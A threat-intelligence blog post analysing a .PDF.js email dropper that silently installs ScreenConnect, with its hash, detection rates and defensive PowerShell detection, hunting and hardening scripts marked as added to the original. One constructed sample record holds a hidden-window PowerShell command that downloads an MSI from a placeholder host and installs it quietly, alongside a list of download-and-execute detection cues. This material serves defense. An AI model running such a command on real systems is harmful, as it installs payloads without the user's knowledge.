
THREAT CHAIN

Posted on • Originally published at threatchain.io

That "Payment Wire" Email Attachment? It's a Trojan Wearing Trusted Software as a Disguise

This article was originally published on ThreatChain — decentralized threat intelligence.

What this sample is, how it abuses ConnectWise ScreenConnect, and how to defend against it.

Picture this: It's a Monday morning. You're the office manager at a mid-size company in Stockholm, plowing through emails. One catches your eye — the subject line says something about a wire payment and a copier invoice. There's an attachment: Payment-WIRE_COPIER.PDF.js. Looks like a PDF. You double-click.

Nothing visible happens. No document opens. You shrug, maybe try again, then move on with your day.

But something did happen. In those few quiet seconds, a script ran in the background and started installing remote access software on your machine, the kind IT departments use every day to manage computers. Except in this case, your IT team didn't install it. Someone else now has remote control of your computer: they can see your screen, move your mouse, browse your files, and come back any time they want.

This is the story of a real malware sample spotted in early April 2026, and it's a clever one. Let's break down what it does, why it's hard to catch, and what you can do about it.


What Is This Thing, Exactly?

The file, Payment-WIRE_COPIER.PDF.js, is a JavaScript file pretending to be a PDF. That .PDF.js double extension is a classic trick. Windows hides the extension of known file types by default, and .js is a known type, so in the file list all you see is Payment-WIRE_COPIER.PDF. It looks completely normal. The one giveaway is the icon: Windows draws its script icon for a .js file, not your PDF reader's icon.

But it's not a document. It's a script, and double-clicking it hands it to the Windows Script Host (wscript.exe), which runs it with your user account's privileges and without asking.

Here's where it gets interesting. The script's goal isn't to install some exotic, never-before-seen virus. Instead, it installs ConnectWise ScreenConnect — a completely legitimate remote management tool that thousands of IT professionals use every day to help employees, fix computers, and manage networks.

Think of ScreenConnect like a spare key to your house. When your landlord has one, it's fine — you trust them. But if a stranger makes a copy and lets themselves in while you're at work? Same key, very different situation.

Security researchers call this category of software RMM tools — Remote Monitoring and Management. They're built to let someone control a computer from far away. When a criminal installs one without your knowledge, it becomes one of the most effective backdoors imaginable, because your antivirus software often trusts it. After all, it's a real, signed, legitimate application.


Why This Attack Is Sneaky (Even by Malware Standards)

A few things make this sample particularly tricky:

1. The code is scrambled on purpose.
The JavaScript inside the file has been run through an obfuscation tool. Think of it like writing a letter in a code language so only the intended recipient can read it: security tools that scan files looking for known bad patterns have a harder time recognizing what the script actually does. Two detection rules (called YARA rules) flagged this sample specifically for suspicious obfuscation and for using PowerShell, a powerful built-in Windows tool that the script likely calls to download and install ScreenConnect silently. Obfuscation changes how the file looks, not what it does. The script still has to launch something to fetch and install ScreenConnect, and that parent-child chain (a script host spawning PowerShell on an office workstation) is visible to anyone watching process creation, however scrambled the file itself is.

2. It abuses trust.
Once ScreenConnect is installed, the attacker has a tool that looks identical to what a legitimate IT admin would use. Many security products won't flag it. It's like a burglar wearing a uniform from your building's maintenance company — the security guard waves them right through.

3. Detection rates are low.
When this file was first scanned across 76 different antivirus engines, only 14 out of 76 flagged it as malicious. That means over 80% of security tools let it through. Kaspersky and Spamhaus flagged it. FileScan rated it "likely malicious." But the majority? Silence.
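To make the obfuscation point concrete, here is an added PowerShell example (not code from the original post or from ThreatChain) for the behaviour that obfuscation cannot hide: a Windows script host such as wscript.exe spawning powershell.exe. It is written against Sysmon Event ID 1 field names (ParentImage, Image, CommandLine). The two sample records at the bottom are constructed for illustration, and the download URL in them is a placeholder, not an indicator taken from the real sample.

```powershell
# Added example (not from the original post): flag a Windows script host launching
# PowerShell, the chain a double-clicked .js dropper produces. Field names follow
# Sysmon Event ID 1 (ProcessCreate); the sample records below are constructed.

function Test-ScriptHostToPowerShell {
    param(
        [Parameter(Mandatory)] [string]$ParentImage,
        [Parameter(Mandatory)] [string]$Image,
        [string]$CommandLine = ''
    )
    $scriptHosts = @('wscript.exe', 'cscript.exe', 'mshta.exe')
    $parentName  = [System.IO.Path]::GetFileName($ParentImage).ToLowerInvariant()
    $childName   = [System.IO.Path]::GetFileName($Image).ToLowerInvariant()

    if ($parentName -notin $scriptHosts)                    { return $null }
    if ($childName  -notin @('powershell.exe', 'pwsh.exe')) { return $null }

    # Download-and-run cues typical of droppers. The parent/child chain alone is
    # already suspicious on a workstation; any cue raises severity to high.
    $cues = @('DownloadString', 'DownloadFile', 'Invoke-WebRequest', 'iwr ', 'Invoke-Expression',
              'iex ', 'Start-BitsTransfer', 'msiexec', 'ScreenConnect', '-enc', '-w hidden', '-nop')
    $hits = @($cues | Where-Object { $CommandLine -match [regex]::Escape($_) })   # -match is case-insensitive
    $severity = if ($hits.Count -gt 0) { 'high' } else { 'medium' }

    [pscustomobject]@{
        Parent   = $parentName
        Child    = $childName
        Severity = $severity
        Cues     = ($hits -join ', ')
        Command  = $CommandLine
    }
}

# Constructed sample records (shaped like Sysmon ID 1 data, not real telemetry).
$sampleEvents = @(
    @{ ParentImage = 'C:\Windows\System32\wscript.exe'
       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe -nop -w hidden -c "iwr https://example.invalid/sc.msi -OutFile $env:TEMP\sc.msi; msiexec /i $env:TEMP\sc.msi /qn"' },
    @{ ParentImage = 'C:\Windows\explorer.exe'
       Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe -File C:\Scripts\nightly-backup.ps1' }
)
foreach ($e in $sampleEvents) {
    $r = Test-ScriptHostToPowerShell @e
    if ($r) { $r | Format-List }      # only the wscript.exe -> powershell.exe record is reported
}

# Live hunt over the Sysmon log (needs Sysmon installed and rights to read the log).
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $d = @{}
        foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d.ParentImage -and $d.Image) {
            Test-ScriptHostToPowerShell -ParentImage $d.ParentImage -Image $d.Image -CommandLine $d.CommandLine
        }
    } | Where-Object { $_ }
```

The same logic maps onto Security event 4688 (Creator Process Name, New Process Name, Process Command Line) if you have command-line auditing enabled instead of Sysmon. Expect a few medium-severity hits from legitimate logon scripts; the high-severity combination of a script host, a hidden window and a download cue is what deserves an immediate look.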


Who's at Risk, and What's the Real Damage?

This sample was first seen originating from Sweden, but the technique is used globally. The targets tend to be:

  • Small and mid-size businesses that don't have dedicated security teams
  • Finance and accounting departments (the "payment wire" lure is aimed squarely at them)
  • Anyone who handles invoices, payments, or vendor communications by email

Once an attacker has ScreenConnect running on your machine, they can:

  • Watch your screen in real time — see passwords you type, emails you read, banking sessions you open
  • Browse and steal files — client lists, contracts, financial records, anything on your hard drive or network shares
  • Install additional malware — ransomware (digital kidnapping of your files), keyloggers, or tools to move deeper into your company's network
  • Come back whenever they want. The ScreenConnect client installs itself as a Windows service that starts at boot, so the access survives reboots and sits quietly in the background. It's the spare key under the doormat: the attacker can return after you think you've cleaned up.

For a small business, this could mean a drained bank account, a data breach you're legally required to report, or a ransomware attack that shuts down operations for days.


The Technical Fingerprint

For anyone who wants to check their systems or share this with their IT provider, here are the specifics:

Detail           Value
File name        Payment-WIRE_COPIER.PDF.js
File type        JavaScript (.js)
File size        ~16 KB
SHA-256 hash     5bbb1e4d714fac5f326d55fff88e1267f537121d64cb4ba488bb3f7a7215021a
First seen       April 6, 2026
Detection rate   14 out of 76 antivirus engines
Flagged by       Kaspersky (Malware), Spamhaus (Malicious), FileScan (Likely Malicious)
Malware family   ConnectWise / ScreenConnect (abused legitimate RMM tool)

A SHA-256 hash is like a fingerprint for a file: if this exact file is on a system, it will produce this exact hash, and your IT team can search for it. One caveat: the hash identifies only this specific file. If the attackers re-obfuscate the script, even slightly, the hash changes, so treat a hash miss as "this copy isn't here", not as "we're clean".
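As an added example (not from the original post), here is a PowerShell sweep your IT team could run on a suspect workstation. It hashes script-type files under the usual attachment landing folders and compares them with the SHA-256 above, and it also flags double-extension names like .pdf.js regardless of hash, which is what catches the re-obfuscated variant the hash misses. The folder list and the set of document-looking extensions are my assumptions; adjust them to where your mail client saves attachments.

```powershell
# Added example (not from the original post): sweep attachment landing folders for
# (a) the published SHA-256 and (b) double-extension script names such as *.pdf.js.
# Folder list and extension lists are assumptions; tune them for your environment.

$Ioc = '5bbb1e4d714fac5f326d55fff88e1267f537121d64cb4ba488bb3f7a7215021a'

$scanRoots = @(
    "$env:USERPROFILE\Downloads",
    "$env:USERPROFILE\Desktop",
    "$env:LOCALAPPDATA\Microsoft\Windows\INetCache",   # Outlook/browser attachment cache (assumed location)
    $env:TEMP
) | Where-Object { $_ -and (Test-Path -LiteralPath $_) }

# Script types Windows Script Host or mshta.exe will execute on double-click.
$scriptExt = @('.js', '.jse', '.vbs', '.vbe', '.wsf', '.wsh', '.hta')
# "invoice.pdf.js": a document-looking extension immediately followed by a script extension.
$doubleExt = '(?i)\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.(js|jse|vbs|vbe|wsf|wsh|hta)$'

function Find-SuspiciousAttachments {
    param([string[]]$Roots, [string]$KnownBadSha256)
    foreach ($root in $Roots) {
        foreach ($f in Get-ChildItem -LiteralPath $root -File -Recurse -ErrorAction SilentlyContinue) {
            $reasons = @()
            if ($f.Name -match $doubleExt) { $reasons += 'double extension' }
            if ($f.Extension.ToLowerInvariant() -in $scriptExt) {
                # Hash only script-type files; hashing everything is slow and buys nothing here.
                $hash = (Get-FileHash -LiteralPath $f.FullName -Algorithm SHA256).Hash.ToLowerInvariant()
                if ($hash -eq $KnownBadSha256.ToLowerInvariant()) { $reasons += 'SHA-256 matches published IOC' }
                elseif ($reasons.Count -eq 0)                     { $reasons += 'script attachment type' }
            }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{ Path = $f.FullName; Bytes = $f.Length; Modified = $f.LastWriteTime; Reasons = ($reasons -join '; ') }
            }
        }
    }
}

Find-SuspiciousAttachments -Roots $scanRoots -KnownBadSha256 $Ioc | Format-Table -AutoSize
```

Run it as the user who received the email, since the landing folders are per-user. A "double extension" hit on a file whose hash does not match is still worth a look: it is the same lure with a different wrapper.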


What You Can Do Right Now

You don't need a million-dollar security budget to protect yourself from this. Here are five concrete steps:

1. Never open .js files from email. There is almost no legitimate reason for someone to send you a JavaScript file as an attachment, and the same goes for its siblings (.jse, .vbs, .wsf, .hta), which Windows runs just as readily. If you see .js at the end of a file name, or a suspicious double extension like .PDF.js, delete the email. If you think it might be real, call the sender directly to confirm.

2. Make Windows show file extensions. By default, Windows hides the extensions of known file types, which is exactly what makes the .PDF.js trick work. On Windows 10, open File Explorer → View tab → tick "File name extensions"; on Windows 11 it is File Explorer → View → Show → File name extensions. Now you'll always see the real file type.

3. Check for unauthorized ScreenConnect installations. Ask your IT team (or check yourself): is ConnectWise ScreenConnect installed on any machines where it shouldn't be? Look for a Windows service named "ScreenConnect Client" followed by an identifier in parentheses, a program called "ScreenConnect" or "ConnectWise Control" in Add/Remove Programs, or a "ScreenConnect Client" folder under Program Files that nobody in your organization set up. The service's startup command includes the address of the relay server the client reports to; if that isn't your IT provider's server, it isn't your IT provider's session. If you find one your IT team didn't install, treat it as a breach: disconnect the machine from the network first and uninstall second, so you don't destroy the evidence of what else was done.

4. Keep your antivirus updated and use email filtering. This sample slipped past most antivirus engines at first, but detection improves rapidly once a sample is identified. Keeping your security tools current means you benefit from those updates. If your email provider offers attachment scanning or filtering, make sure it's turned on and configured to block or quarantine script files.

5. Talk to your team. The most effective defense against this kind of attack is a 10-minute conversation. Tell your colleagues: "If you get an unexpected email about a payment or invoice with an attachment, don't open the attachment. Forward it to me (or IT) first." That one habit stops this entire attack chain cold.
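Steps 2 and 3 in working form, as an added PowerShell example (not the post's own material and not ConnectWise documentation). The hunt looks in the four places a ScreenConnect client leaves a footprint: its Windows service, whose name is "ScreenConnect Client (<id>)" and whose image path carries the relay parameters (the h= value is the relay host the client calls home to); running processes; the install folder under Program Files; and the Add/Remove Programs entry. The per-user registry changes afterwards show extensions and re-point double-clicked script files at Notepad. The .js re-mapping is a common mitigation but an assumption here, so verify it on a test file before rolling it out.

```powershell
# Added example (not from the original post): hunt for ScreenConnect footprints, then
# apply two per-user hardening settings. Run elevated for the HKLM/service queries.

function Get-ScreenConnectFootprint {
    $out = @()

    # 1. Service: installed as "ScreenConnect Client (<id>)". Its PathName holds the
    #    relay parameters; h= is the relay host, which should be YOUR IT provider's.
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.Name -like 'ScreenConnect Client*' }) {
        $relay = if ($svc.PathName -match '[?&]h=([^&\s"]+)') { $Matches[1] } else { 'unknown' }
        $out += [pscustomobject]@{ Kind = 'Service'; Name = $svc.Name; State = $svc.State; Detail = "relay host: $relay" }
    }

    # 2. Running client processes (ScreenConnect.ClientService.exe, ScreenConnect.WindowsClient.exe).
    foreach ($p in Get-Process | Where-Object { $_.Name -like 'ScreenConnect*' }) {
        $out += [pscustomobject]@{ Kind = 'Process'; Name = $p.Name; State = "PID $($p.Id)"; Detail = $p.Path }
    }

    # 3. Install folder under Program Files / Program Files (x86).
    foreach ($pf in @($env:ProgramFiles, ${env:ProgramFiles(x86)})) {
        if (-not $pf) { continue }
        foreach ($dir in Get-ChildItem -LiteralPath $pf -Directory -Filter 'ScreenConnect Client*' -ErrorAction SilentlyContinue) {
            $out += [pscustomobject]@{ Kind = 'Folder'; Name = $dir.Name; State = $dir.LastWriteTime; Detail = $dir.FullName }
        }
    }

    # 4. Add/Remove Programs entries (both 64-bit and 32-bit views).
    $uninstallKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
                     'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    foreach ($app in Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
                     Where-Object { $_.DisplayName -like 'ScreenConnect*' -or $_.DisplayName -like 'ConnectWise Control*' }) {
        $out += [pscustomobject]@{ Kind = 'Uninstall'; Name = $app.DisplayName; State = $app.InstallDate; Detail = $app.InstallLocation }
    }
    return $out
}

$found = Get-ScreenConnectFootprint
if ($found.Count -gt 0) {
    $found | Format-Table -AutoSize
    Write-Warning 'ScreenConnect present. If IT did not install it, isolate the host before removing anything.'
} else {
    'No ScreenConnect footprint found.'
}

# --- Hardening (current user) ---------------------------------------------------

# Step 2: always show file extensions. Explorer picks this up after a sign-out or restart.
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced' -Name 'HideFileExt' -Value 0 -Type DWord

# Step 1, enforced: open script attachments in Notepad instead of running them.
# Assumption: a per-user ProgID override under HKCU\Software\Classes, which takes
# precedence over the machine default. Scripts IT runs explicitly via cscript/wscript
# are unaffected because those are invoked by path, not by double-click.
foreach ($ext in '.js', '.jse', '.vbs', '.vbe', '.wsf') {
    $key = "HKCU:\Software\Classes\$ext"
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key | Out-Null }
    Set-ItemProperty -LiteralPath $key -Name '(Default)' -Value 'txtfile'
}
```

Compare the relay host the hunt reports against the address your IT provider actually uses; a legitimate install and a malicious one look identical apart from who is on the other end of that relay. For fleet-wide enforcement, push the same two registry settings through Group Policy rather than per machine.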


The Bigger Picture

This sample is part of a growing trend where attackers don't bother building custom spy tools from scratch. Why would they, when perfectly good remote access software already exists and is trusted by security products? By wrapping the installation in an obfuscated script and disguising it as a financial document, they've built an attack that's cheap, effective, and hard to detect.

The good news? The attack requires you to open that file. That moment of hesitation — "Wait, why is a PDF actually a .js file?" — is your best firewall.

Stay curious. Stay skeptical. And when in doubt, don't double-click.
